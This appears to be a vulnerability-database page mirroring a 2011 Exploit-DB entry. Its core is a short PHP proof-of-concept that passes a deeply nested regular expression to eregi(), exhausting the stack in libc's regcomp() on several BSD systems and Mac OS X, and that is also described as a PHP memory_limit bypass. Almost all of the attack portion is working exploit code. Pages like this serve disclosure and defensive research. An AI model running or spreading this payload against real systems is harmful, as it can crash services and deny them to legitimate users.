Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Libc - 'regcomp()' Stack Exhaustion Denial of Service

🗓️ 04 Nov 2011 00:00:00Reported by Maksymilian ArciemowiczType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 27 Views

Libc - 'regcomp()' Stack Exhaustion Denial of Servic

Code
<?php
/*
source: https://www.securityfocus.com/bid/50541/info

Multiple Vendors' libc library is prone to a denial-of-service vulnerability due to stack exhaustion.

Successful exploits will allow attackers to make the applications that use the affected library, unresponsive, denying service to legitimate users.

The libc library of the following platforms are affected:

NetBSD 5.1
OpenBSD 5.0
FreeBSD 8.2
Apple Mac OSX

Other versions may also be affected. 
*/
?>

<?
/*
PHP 5.4 5.3 memory_limit bypass exploit poc
by Maksymilian Arciemowicz http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com

To show memory_limit in PHP

# php /www/memlimpoc.php 1 35000000
PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in
/var/www/memlimpoc.php on line 12

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in
/var/www/memlimpoc.php on line 12

and try this

# php /www/memlimpoc.php 2

memory_limit bypassed
*/

ini_set("memory_limit","32M");

if($argv[1]==1)
$sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){
1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");

?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Nov 2011 00:00Current
7.4High risk
Vulners AI Score7.4
securityfocuslibcdenial-of-servicevulnerabilitynetbsdopenbsdfreebsdapple mac osxmemory_limit bypassexploitphp 5.4php 5.3maksymilian arciemowiczcxsecurity
27